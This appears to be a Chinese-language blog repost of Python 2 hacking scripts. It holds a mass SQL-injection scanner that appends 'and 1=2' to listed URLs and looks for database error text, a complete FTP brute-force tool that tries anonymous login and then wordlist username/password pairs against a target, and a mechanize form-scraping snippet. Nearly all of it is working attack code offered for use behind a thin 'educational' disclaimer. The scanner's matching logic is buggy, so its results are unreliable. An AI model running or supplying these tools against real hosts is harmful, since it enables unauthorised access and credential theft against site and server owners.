python注入点查找工具

lsekfe

python SQL InjectionScaner

1. #!/usr/bin/python
   
2. #-*-coding=utf-8-*-
   
3. #Author:@xfk
   
4. #blog:@blog.sina.com.cn/kaiyongdeng
   
5. #Date:@2012-05-07
   
6. #Example site:@http://www.apostilando.com/pagina.php?cod=1
   
7. #将要扫描的网站写入当前目录文件中。python xxx.py  xxx.txt
   

复制代码

1. import urllib
   
2. import os
   
3. import sys
   
4. 
   
5. if os.name == "nt":
   
6.     os.system("cls")
   
7. else:
   
8.     os.system("clear")
   
9. def usage():
   
10.     print """
    
11.     =================SQL INJECTION=====================
    
12.     Usage:python %s %s
    
13.     """ %(sys.argv[0],sys.argv[1])
    
14.    
    
15. def scanner(url):
    
16.     try:
    
17.         page = urllib.urlopen(url).read()
    
18.     except:
    
19.         print "[-]Error!!!\n"
    

复制代码

如果一个网站存在SQL注入的话就，当你使用基本的尝试方法去测试时页面会出现如下报错。

1. sqls = ("mysql_result(): supplied argument is not a valid MySQL result resource in",
   
2.             "[Microsoft][ODBC SQL Server Driver][SQL Server]",
   
3.             "Warning:ociexecute",
   
4.             "Warning: pq_query[function.pg-query]:")
   
5.     i=0
   
6.     page = str(page.lower())
   
7.     while i<len(sqls):
   
8.         sql = str(sqls[i]).lower()
   
9.         if page.find(sql[i]) == -1:
   
10.             check=0
    
11.         else:
    
12.             check=1
    
13.         i+=1
    
14.     if check == 0:
    
15.         print "[-]"+url+" <No Vulneravel>"
    
16.     else:
    
17.         print "[+]"+url+" <Vulneravel>"
    
18.         
    
19. def main(args):
    
20.     if len(args)!=1:
    
21.         usage()
    
22.         print "\t[-]Mode to use: %s <File>\n" % sys.argv[0]
    
23.         print "\t[-]Example: %s Site.txt\n" % sys.argv[0]
    
24. #        print sys.argv[0],sys.argv[1],len(args)
    
25.         sys.exit(0)
    
26.     usage()
    
27.     try:
    
28.         f = open(str(sys.argv[1]),"r")
    
29.         urls = f.readlines()
    
30. #        print urls
    
31.     except:
    
32.         print "[+]Error to open the file "+sys.argv[1]+""
    
33.         return(-1)
    
34.     f.close()
    
35.     i=0
    
36.     while i<len(urls):
    
37.         if urls[i].find("http://") == -1:
    
38.             urls[i] = "http://" + urls[i]
    
39.         urls[i] = urls[i].replace("\n","")
    
40. #        利用基本放法进行测试，如：and 1=1，and 1=2，’，查看是否出现sqls中的错误信息
    
41.         a = scanner(urls[i]+"and 1=2")
    
42.         i+=1
    
43.         
    
44. if __name__ == "__main__":
    
45.     main(sys.argv[1:])
    

复制代码

FTP Brute Forcing Tool——Python FTP暴力破解工具

在当前目录下简历你自己的用户名和密码字典，就能破解出用户名和密码。
参考链接：

1、http://www.oschina.net/code/snippet_244244_10474
2、http://blog.sina.com.cn/kaiyongdeng

1. #!/usr/bin/env python
   
2. #-*-coding = utf-8-*-
   
3. #author:@xfk
   
4. #blog:@blog.sina.com.cn/kaiyongdeng
   
5. #date:@2012-05-08
   
6. 
   
7. import sys, os, time   
   
8. from ftplib import FTP
   
9. 
   
10. docs = """
    
11.     [*] This was written for educational purpose and pentest only. Use it at your own risk.
    
12.     [*] Author will be not responsible for any damage!
    
13.     [*] Toolname        : ftp_bf.py
    
14.     [*] Coder           :
    
15.     [*] Version         : 0.1
    
16.     [*] ample of use  : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    
17.     """
    
18. 
    
19. if sys.platform == 'linux' or sys.platform == 'linux2':
    
20.     clearing = 'clear'
    
21. else:
    
22.     clearing = 'cls'
    
23. os.system(clearing)
    
24. 
    
25. R = "\033[31m";
    
26. G = "\033[32m";
    
27. Y = "\033[33m"
    
28. END = "\033[0m"
    
29. 
    
30. def logo():
    
31.     print G+"\n         |---------------------------------------------------------------|"
    
32.     print "        |                                                               |"
    
33.         print "        |          blog.sina.com.cn/kaiyongdeng                    |"
    
34.         print "        |            08/05/2012 ftp_bf.py v.0.1                     |"
    
35.     print "        |            FTP Brute Forcing Tool                       |"
    
36.         print "        |                                                               |"
    
37.         print "        |---------------------------------------------------------------|\n"
    
38.     print "    \n         [-] %s\n" % time.strftime("%X")
    
39.     print docs+END
    
40.    
    
41. def help():
    
42.         print R+"[*]-t, --target            ip/hostname     <> Our target"
    
43.     print "[*]-u, --usernamelist      usernamelist    <> usernamelist path"
    
44.     print "[*]-p, --passwordlist      passwordlist    <> passwordlist path"
    
45.     print "[*]-h, --help              help            <> print this help"
    
46.     print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END
    
47.     sys.exit(1)
    
48. 
    
49. def bf_login(hostname,username,password):
    
50. #    sys.stdout.write("\r[!]Checking : %s " % (p))
    
51. #    sys.stdout.flush()
    
52.     try:
    
53.         ftp = FTP(hostname)
    
54.         ftp.login(username, password)
    
55.         ftp.retrlines('list')
    
56.         ftp.quit()
    
57.         print Y+"\n[!] w00t,w00t!!! We did it ! "
    
58.         print "[+] Target : ",hostname, ""
    
59.         print "[+] User : ",username, ""
    
60.         print "[+] Password : ",password, ""+END
    
61.         return 1
    
62. #        sys.exit(1)
    
63.     except Exception, e:
    
64.         pass
    
65.     except KeyboardInterrupt:
    
66.         print R+"\n[-] Exiting ...\n"+END
    
67.         sys.exit(1)
    
68. 
    
69. def anon_login(hostname):
    
70.     try:
    
71.         print G+"\n[!] Checking for anonymous login.\n"+END
    
72.         ftp = FTP(hostname)
    
73.         ftp.login()
    
74.         ftp.retrlines('LIST')
    
75.         print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END
    
76.         
    
77.         ftp.quit()
    
78.     except Exception, e:
    
79.         print R+"\n[-] Anonymous login failed...\n"+END
    
80.         pass
    
81. def main():
    
82.     logo()
    
83.     try:
    
84.         for arg in sys.argv:
    
85.             if arg.lower() == '-t' or arg.lower() == '--target':
    
86.                 hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
    
87.             elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
    
88.                 usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
    
89.             elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
    
90.                 passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
    
91.             elif arg.lower() == '-h' or arg.lower() == '--help':
    
92.                 help()
    
93.             elif len(sys.argv) <= 1:
    
94.                 help()
    
95.     except:
    
96.         print R+"[-]Cheak your parametars input\n"+END
    
97.         help()
    
98.     print G+"[!] BruteForcing target ..."+END
    
99.     anon_login(hostname)
    
100. #    print "here is ok"
     
101. #    print hostname
     
102.     try:   
     
103.         usernames = open(usernamelist, "r")
     
104.         user = usernames.readlines()
     
105.         count1 = 0
     
106.         while count1 < len(user):
     
107.             user[count1] = user[count1].strip()
     
108.             count1 +=1
     
109.     except:
     
110.         print R+"\n[-] Cheak your usernamelist path\n"+END
     
111.         sys.exit(1)
     
112. #    print "here is ok ",usernamelist,passwordlist
     
113.     try:
     
114.         passwords = open(passwordlist, "r")
     
115.         pwd = passwords.readlines()
     
116.         count2 = 0
     
117.         while count2 < len(pwd):
     
118.             pwd[count2] = pwd[count2].strip()
     
119.             count2 +=1
     
120.     except:
     
121.         print R+"\n[-] Check your passwordlist path\n"+END
     
122.         sys.exit(1)
     
123. 
     
124.     print G+"\n[+] Loaded:",len(user),"usernames"
     
125.     print "\n[+] Loaded:",len(pwd),"passwords"
     
126.     print "[+] Target:",hostname
     
127.     print "[+] Guessing...\n"+END
     
128. 
     
129.     for u in user:
     
130.         for p in pwd:
     
131.             result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
     
132.             if result != 1:
     
133.                 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
     
134.             else:
     
135.                 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
     
136.     if not result :
     
137.         print R+"\n[-]There is no username ans password enabled in the list."
     
138.         print "[-]Exiting...\n"+END
     
139. 
     
140. if __name__ == "__main__":
     
141.     main()
     

复制代码

牛逼的python模块—mechanize今天又找到了一个好使的，NB的python模块哦，大家来看看吧，比python自家的urllib和urllib2更好使撒！！！
连接：http://wwwsearch.sourceforge.net/mechanize/
下面是mechanize的有点，看了怎么能不心动呢！！！！？？？？

有时间写个应用，敬请期待，搞起。。。。。。

1. •        mechanize.Browser and mechanize.UserAgentBase implement the interface of urllib2.OpenerDirector, so:
   
2. o        any URL can be opened, not just http:
   
3. o        mechanize.UserAgentBase offers easy dynamic configuration of user-agent features like protocol, cookie, redirection and robots.txt handling, without having to make a new OpenerDirector each time, e.g. by calling build_opener().
   
4. •        Easy HTML form filling.
   
5. •        Convenient link parsing and following.
   
6. •        Browser history (.back() and .reload() methods).
   
7. •        The Referer HTTP header is added properly (optional).
   
8. •        Automatic observance of robots.txt.
   
9. •        Automatic handling of HTTP-Equiv and Refresh.
   

复制代码

提取网页表单信息#!/usr/bin/env python
#-*-coding = utf-8-*-
import mechanize
import sys

1. br = mechanize.Browser()
   
2. response = br.open(sys.argv[1])
   
3. for form in br.forms():
   
4.     print "name:[%r] id:[%r] action:[%s]" %(form.name, form.attrs.get('id'), form.action)
   
5.     print "Controls: "
   
6.     for control in form.controls:
   
7.         print '    ', control.type, control.name, repr(control.value)
   
8.     print(" ")

复制代码

这是我早OSChina上看到的最简单的利用python提取网页表单信息的脚本，短小精悍。关键在于它的mechanize模块，网上对这个模块的介绍很少，全靠自己慢慢摸索！！！
在网上找到不少类似相关的网站讲这些网页表单信息提取的东东，大家有兴趣可以研究研究撒！！！
http://twill.idyll.org/python-api.html
http://search.cpan.org/~jesse/WW ... ib/WWW/Mechanize.pm


转摘至 http://zhan.renren.com/pythonfocus?checked=true